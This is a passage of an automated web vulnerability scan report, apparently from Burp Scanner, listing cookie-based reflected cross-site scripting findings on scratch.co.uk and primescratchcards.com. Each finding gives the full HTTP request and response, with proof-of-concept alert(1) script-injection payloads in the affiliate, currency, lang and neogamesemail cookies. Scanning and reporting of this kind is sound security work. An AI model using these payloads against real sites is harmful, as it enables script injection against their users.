Connection: close
Cookie: ARC=13013785468"%3balert(1)//e0168fa7962; pscref=; plstat=0; ASPSESSIONIDCQTRSBSQ=AJLOLGNDGLNNOIDDIDCNODGD;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:38:30 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 19399
Content-Type: text/html
Set-Cookie: ARC=13013785468%22%3Balert%281%29%2F%2Fe0168fa7962; expires=Tue, 15-May-2012 12:38:30 GMT; domain=.primescratchcards.com; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Car
...[SNIP]...
<img src='http://trk.primescratchcards.com/?ac=99&brandId=5143&AR=13013785468";alert(1)//e0168fa7962' border='0' width='1' height='1'>
...[SNIP]...

3.145. http://scratch.co.uk/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36051"><script>alert(1)</script>f6746a21160 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C24336051"><script>alert(1)</script>f6746a21160; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C24336051%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef6746a21160; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:50 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:50 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG', 'direct-173|193|214|24336051"><script>alert(1)</script>f6746a21160');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.146. http://scratch.co.uk/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the affiliate cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 485c6"%3balert(1)//e22d61d7a59 was submitted in the affiliate cookie. This input was echoed as 485c6";alert(1)//e22d61d7a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243485c6"%3balert(1)//e22d61d7a59; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:25:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243485c6%22%3Balert%281%29%2F%2Fe22d61d7a59; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:25:51 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:25:51 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
xt/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG', 'direct-173|193|214|243485c6";alert(1)//e22d61d7a59');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               topprizes: '$1,000,000',
               
...[SNIP]...

3.147. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce5d"><script>alert(1)</script>16e5937d22d was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=dce5d"><script>alert(1)</script>16e5937d22d; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=dce5d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E16e5937d22d; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11363

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('dce5d"><script>alert(1)</script>16e5937d22d', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.148. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into the name of an HTML tag attribute. The payload 58c29><script>alert(1)</script>cfec32cd964 was submitted in the currency cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29><script>alert(1)</script>cfec32cd964; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c744558c29%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ecfec32cd964; expires=Wed, 15-Jun-2011 12:59:18 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:18 GMT; path=/
Content-Type: text/html
Content-Length: 11427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD737fc";alert(1)//814391c744558c29><script>alert(1)</script>cfec32cd964', 'ENG', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.149. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 21696"%3balert(1)//58111e9164 was submitted in the currency cookie. This input was echoed as 21696";alert(1)//58111e9164 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=21696"%3balert(1)//58111e9164; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: currency=21696%22%3Balert%281%29%2F%2F58111e9164; expires=Wed, 15-Jun-2011 12:59:19 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:19 GMT; path=/
Content-Type: text/html
Content-Length: 11229

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('21696";alert(1)//58111e9164', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.150. http://scratch.co.uk/ [currency cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the currency cookie is copied into a JavaScript rest-of-line comment. The payload 161fb%0aalert(1)//2182f944140 was submitted in the currency cookie. This input was echoed as 161fb
alert(1)//2182f944140
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: scratch.co.uk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://scratch.co.uk/?currency=USD737fc%22%3balert(1)//814391c7445
Cookie: affiliate=direct-173%7C193%7C214%7C243; lang=ENG; currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0aalert(1)//2182f944140; neogamesemail=deleted%7E%7E; __utma=170832034.749346019.1305550695.1305550695.1305550695.1; __utmb=170832034.8.8.1305550735270; __utmc=170832034; __utmz=170832034.1305550695.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/29; PHPSESSID=eiture7mb7g66oo3tttam6nfm5

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:59:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: currency=USD737fc%22%3Balert%281%29%2F%2F814391c7445161fb%0Aalert%281%29%2F%2F2182f944140; expires=Wed, 15-Jun-2011 12:59:20 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:59:20 GMT; path=/
Content-Type: text/html
Content-Length: 11477

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
e="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD737fc";alert(1)//814391c7445161fb
alert(1)//2182f944140
', 'ENG', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '53,521,715',
               topprizetext: 'Scratch 2 to Win',
       
...[SNIP]...

3.151. http://scratch.co.uk/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 74696"%3balert(1)//2bb8cf6f796 was submitted in the lang cookie. This input was echoed as 74696";alert(1)//2bb8cf6f796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG74696"%3balert(1)//2bb8cf6f796; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: lang=ENG74696%22%3Balert%281%29%2F%2F2bb8cf6f796; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:13 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:13 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<script type="text/javascript">
$(document).ready(function() {
flashembed("middleflash", {src: "/images/scratch3a.swf?clickTag=javascript:openScratch('USD', 'ENG74696";alert(1)//2bb8cf6f796', 'direct-173|193|214|243');", w3c: true, wmode: "transparent"}, {
monthlyprizetext: 'Won Last Month',
               monthlyprize: '$53,521,715',
               topprizetext: 'Scratch $2 to Win',
               top
...[SNIP]...

3.152. http://scratch.co.uk/ [lang cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the lang cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2298d"><script>alert(1)</script>bfab089b01f was submitted in the lang cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG2298d"><script>alert(1)</script>bfab089b01f; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:29:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: lang=ENG2298d%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebfab089b01f; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:29:11 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:29:11 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('USD', 'ENG2298d"><script>alert(1)</script>bfab089b01f', 'direct-173|193|214|243');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...

3.153. http://scratch.co.uk/ [neogamesemail cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /

Issue detail

The value of the neogamesemail cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af05e"><script>alert(1)</script>d33344ce0f7 was submitted in the neogamesemail cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?currency=USD HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deletedaf05e"><script>alert(1)</script>d33344ce0f7; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:27:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: currency=USD; expires=Wed, 15-Jun-2011 12:27:03 GMT; path=/
Set-Cookie: neogamesemail=deletedaf05e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed33344ce0f7%7E%7E; expires=Tue, 17-May-2011 00:27:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 14257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="http://www.hopa.com/visit.aspx?csi=10&amp;CorID=deletedaf05e"><script>alert(1)</script>d33344ce0f7&amp;SentDate=&amp;CorExpTime=&amp;" class="iframe" >
...[SNIP]...

3.154. http://scratch.co.uk/about/ [affiliate cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scratch.co.uk
Path:   /about/

Issue detail

The value of the affiliate cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c841f"><script>alert(1)</script>c26133aa53 was submitted in the affiliate cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /about/ HTTP/1.1
Host: scratch.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: affiliate=direct-173%7C193%7C214%7C243c841f"><script>alert(1)</script>c26133aa53; __utmz=170832034.1305546095.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=uoi3rve7v69eaglpo2h88ev7o6; neogamesemail=deleted; __utma=170832034.59486741.1305546095.1305546095.1305546095.1; __utmc=170832034; __utmb=170832034.1.10.1305546095; lang=ENG; currency=GBP;

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:26:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Cache-control: private
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: affiliate=direct-173%7C193%7C214%7C243c841f%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ec26133aa53; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: lang=ENG; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: currency=GBP; expires=Wed, 15-Jun-2011 12:26:03 GMT; path=/
Set-Cookie: neogamesemail=deleted%7E%7E; expires=Tue, 17-May-2011 00:26:03 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 13261

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content
...[SNIP]...
<a href="javascript:openScratch('GBP', 'ENG', 'direct-173|193|214|243c841f"><script>alert(1)</script>c26133aa53');" onclick="pageTracker._trackEvent('Join', 'Top Nav');">
...[SNIP]...
